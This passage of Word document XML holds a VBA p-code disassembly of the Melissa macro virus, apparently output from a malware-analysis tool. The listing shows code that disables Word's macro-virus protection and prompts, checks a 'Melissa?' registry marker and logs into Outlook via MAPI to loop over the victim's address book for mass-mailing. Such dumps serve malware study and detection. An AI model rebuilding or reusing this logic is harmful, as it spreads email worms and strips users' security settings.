        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Macro"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349605BD" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Tools"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A66FC26" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd CommandBars 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE44280" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Controls 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED81CB6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Enabled </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D267C2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E337B2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC86AB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33275A9D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CC02B2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389008FB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B5665F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt ConfirmConversions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3224EE2E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoS 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD21FDF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111D7A97" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F4BEC2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7246F263" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CDBEF8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E240570" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt VirusProtection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F16F42" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoS 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745FB15" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE591A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D19AD" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537EFCE1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B82778" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CEF75E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt SaveNormalPrompt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F4A3A4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2236CA42" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA0D3C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #9:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA86AB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Dim </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D4016" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VarDefn UngaDasOutlook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69407065" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VarDefn DasMapiName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824BBD0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VarDefn BreakUmOffASlice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644614B2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F94CD59" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96C39F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0013 "Outlook.Application"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DB8101" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd CreateObject 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0DFD3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set UngaDasOutlook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC78109" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #11:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE18E1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFD24B7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0004 "MAPI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79764410" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld UngaDasOutlook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E13DF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd GetNameSpace 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ED27CF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221CE2DA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #12:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493796F1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A67BE8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC63C0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "Melissa?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB88F3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981C811" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd PrivateProfileString 0x0003 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4FC55" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x000E "... by Kwyjibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B11FA5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5717E3D1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8BB1D3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C31D0E1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld UngaDasOutlook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2730CA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "Outlook"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50878255" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799FE59F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0638F070" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #14:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CACE9" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0007 "profile"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513257A3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1358DEC3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53668A72" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall Logon 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDA2CAE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #15:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0CCF5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">StartForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F379E5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E980415" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E174D1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B51F0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30934020" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd AddressLists </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0FE099" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Count </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2828004F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A0AF6B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #16:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7651BF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522AD6DD" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081CB41" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DasMapiName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F56D4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd AddressLists 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92D12A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set AddyBook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F2367" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #17:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE1CE2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5196C452" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF65CCD" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #18:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952E43D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SetStmt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0AC1BE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B757BD" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld UngaDasOutlook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BADAC99" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd CreateItem 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C35999" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Set BreakUmOffASlice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715131B3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #19:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC882D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">StartForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573112C5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld oo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9E30A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndForVariable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6077B772" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC56ED2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld AddyBook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10396966" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd AddressEntries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D3251" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd Count </w:t>
      </w:r>
    </w:p>
